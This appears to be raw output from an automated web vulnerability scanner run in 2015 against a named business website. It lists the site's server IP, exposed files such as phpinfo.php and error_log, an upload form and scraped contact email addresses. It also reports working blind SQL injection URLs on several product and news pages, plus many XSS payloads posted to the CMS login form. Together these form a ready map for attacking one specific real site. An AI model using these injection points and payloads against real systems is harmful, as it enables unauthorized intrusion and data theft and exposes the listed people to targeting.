crawling www.mascoc.com

===================================================================================================
| Domain: http://www.mascoc.com/
| Server: Apache
| IP: 82.98.134.88
===================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://www.mascoc.com/cms/
| [+] CODE: 200 URL: http://www.mascoc.com/icons/
===================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://www.mascoc.com/error_log
| [+] CODE: 200 URL: http://www.mascoc.com/index.cgi
| [+] CODE: 200 URL: http://www.mascoc.com/index.do
| [+] CODE: 200 URL: http://www.mascoc.com/index.cfm
| [+] CODE: 200 URL: http://www.mascoc.com/index.htm
| [+] CODE: 200 URL: http://www.mascoc.com/index.html
| [+] CODE: 200 URL: http://www.mascoc.com/index.html~
| [+] CODE: 200 URL: http://www.mascoc.com/index.html%20
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.bak
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ca
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.cz.iso8859-2
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.de
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.dk
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ee
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.el
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.en
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.et
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.es
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.he.iso8859-8
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.hr.iso8859-2
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.it
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ja.iso2022-jp
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.kr.iso2022-kr
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.lu.utf8
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ltz.utf8
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.nl
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.nn
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.no
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.po.iso8859-2
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.pt
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.pt-br
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.cp-1251
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.cp866
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.iso-ru
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.koi8-r
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.se
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.utf8
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.tw
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.tw.Big5
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.var
| [+] CODE: 200 URL: http://www.mascoc.com/index.jhtml
| [+] CODE: 200 URL: http://www.mascoc.com/index.php
| [+] CODE: 200 URL: http://www.mascoc.com/index.php3
| [+] CODE: 200 URL: http://www.mascoc.com/index.shtml
| [+] CODE: 200 URL: http://www.mascoc.com/index.pl
| [+] CODE: 200 URL: http://www.mascoc.com/index.html.fr
| [+] CODE: 200 URL: http://www.mascoc.com/mailman/listinfo
| [+] CODE: 200 URL: http://www.mascoc.com/phpinfo.php
===================================================================================================
|
| Check robots.txt:
|
| Check sitemap.xml:
===================================================================================================
|
| Crawler Started:
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| [+] Crawling finished, 72 URL's found!
|
| File Upload Forms:
| [+] Upload Form Found: http://www.mascoc.com/cargar/
|
| Web Backdoors:
|
| E-mails:
| [+] E-mail Found: kevinh@kevcom.com
| [+] E-mail Found: mailman@d448.dinaserver.com
| [+] E-mail Found: license@php.net
| [+] E-mail Found: ventas@mascoc.com
| [+] E-mail Found: ricambi@elevatorisrl.com
| [+] E-mail Found: soporte@mascoc.com
| [+] E-mail Found: info@mascoc.com
| [+] E-mail Found: mike@hyperreal.org
| [+] E-mail Found: webmaster@mascoc.com
|
| FCKeditor File Upload:
|
| PHPinfo() Disclosure:
| [+] phpinfo() page: http://www.mascoc.com/phpinfo.php
| 	System: Linux d448.dinaserver.com 2.6.32.48-grsec-dh #1 SMP Thu Nov 24 09:29:43 CET 2011 x86_64
| 	allow_url_fopen: On
| 	allow_url_include: Off
| 	disable_functions: <i>no value</i>
| 	safe_mode: Off
| 	safe_mode_exec_dir: <i>no value</i>
|
| Source Code Disclosure:
|
| External hosts:
| [+] External Host Found: http://ajax.googleapis.com
| [+] External Host Found: http://maps.google.com
| [+] External Host Found: http://d448.dinaserver.com
| [+] External Host Found: http://www.hardened-php.net
| [+] External Host Found: http://css3-mediaqueries-js.googlecode.com
| [+] External Host Found: http://httpd.apache.org
| [+] External Host Found: http://www.gnu.org
| [+] External Host Found: http://html5shim.googlecode.com
|
| Timthumb:
|
| Ignored Files:
===================================================================================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 1 New directories added
|
|
| FCKeditor tests:
|
|
| Timthumb < 1.33 vulnerability:
|
|
| Backup Files:
|
|
| Blind SQL Injection:
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=3+AND+1=1
| [+] Keyword: FERGUSON
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=4+AND+1=1
| [+] Keyword: ELEVADORA
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=5+AND+1=1
| [+] Keyword: lavado
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=2+AND+1=1
| [+] Keyword: comerciales
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=3+AND+1=1
| [+] Keyword: MODELO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=4+AND+1=1
| [+] Keyword: LIFTLUX
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=6+AND+1=1
| [+] Keyword: QUIJADA
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=1+AND+1=1
| [+] Keyword: HOLLAND
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=2+AND+1=1
| [+] Keyword: HOLLAND
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=1+AND+1=1
| [+] Keyword: construccion
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=22+AND+1=1
| [+] Keyword: FERGUSON
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=29+AND+1=1
| [+] Keyword: ELEVADORA
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=74+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=73+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=72+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=20+AND+1=1
| [+] Keyword: Habana
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=21+AND+1=1
| [+] Keyword: conclusi�n
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=26+AND+1=1
| [+] Keyword: amilan
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=71+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=29+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=5+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=69+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=70+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=7+AND+1=1
| [+] Keyword: CONTENIDO
| [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=6+AND+1=1
| [+] Keyword: CONTENIDO
|
|
| Local File Include:
|
|
| PHP CGI Argument Injection:
|
|
| Remote Command Execution:
|
|
| Remote File Include:
|
|
| SQL Injection:
|
|
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario="><script>alert('XSS')</script>&clave=123
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario="><IMG SRC="javascript:alert('XSS');">&clave=123
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">&clave=123
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&clave=123
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario="><DIV STYLE="background-image: url(javascript:alert('XSS'))">&clave=123
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario="><body onload="javascript:alert('XSS')"></body>&clave=123
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario="><table background="javascript:alert('XSS')"></table>&clave=123
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario=123&clave="><script>alert('XSS')</script>
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario=123&clave="><IMG SRC="javascript:alert('XSS');">
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario=123&clave="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario=123&clave="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario=123&clave="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario=123&clave="><body onload="javascript:alert('XSS')"></body>
| [+] Vul [XSS] http://www.mascoc.com/logincms.php
| Post data: &usuario=123&clave="><table background="javascript:alert('XSS')"></table>
|
|
| Web Shell Finder:
===================================================================================================
| Static tests:
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.1 Loaded.
|
|
| Local File Include:
|
|
| Remote Command Execution:
|
|
| Remote File Include:
===================================================================================================
Scan end date: 24-10-2015 23:6:41


HTML report saved in: report/www.mascoc.com.html